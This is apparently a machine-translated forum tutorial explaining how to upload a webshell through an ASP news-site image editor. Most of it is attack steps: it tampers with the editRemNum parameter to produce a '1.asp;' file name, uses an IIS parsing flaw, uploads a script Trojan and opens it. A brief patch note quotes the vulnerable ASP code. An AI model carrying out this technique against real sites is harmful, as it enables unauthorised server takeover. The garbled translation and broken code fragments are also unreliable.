This editor is quite rudimentary, and in the afternoon take the stand when the come across a There is no database backup, there's nothing you can directly Upload a webshell place, shabby to only one editor interface.
Simple to say under the use of the method. Click on the image upload will appear after the upload page, the address is
With ordinary picture after uploading, the address is <http://www.xxx.cn/news/uppic/41513102009204012_1.gif>
Remember this time the path
Click on the picture to upload, this time the address becomes a http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=4 1 5 1 3 1 0 2 0 0 9 2 0 4 0 1 2
Obviously. The picture of the address is based on the RemNum behind the number generation.
The use is very simple with IIS parsing vulnerability, the RemNum later modify the data for the 1. asp;4 1 5 1 3 1 0 2 0 0 9 2 0 4 0 1 2
Into the following this address
Then in the browser open
Then select your script Trojan upload
Will be returned to the following address uppic/1. asp;41513102009204012_2.gif
And then directly open is our pony address!
Plus the patch method!
by:think you're blocking stopper to break the wall
if editRemNum<>"" then remNum = editRemNum else Randomize remNum = Int((9 9 9 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time) end if remFileName = remNum&"_"&(editImageNum+1)&". gif" end if
Hey, first does not explain.
Remove from definitions section, leaving only then the parameters can be.
Randomize remNum = Int((9 9 9 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time) end if remFileName = remNum&"_"&(editImageNum+1)&". gif"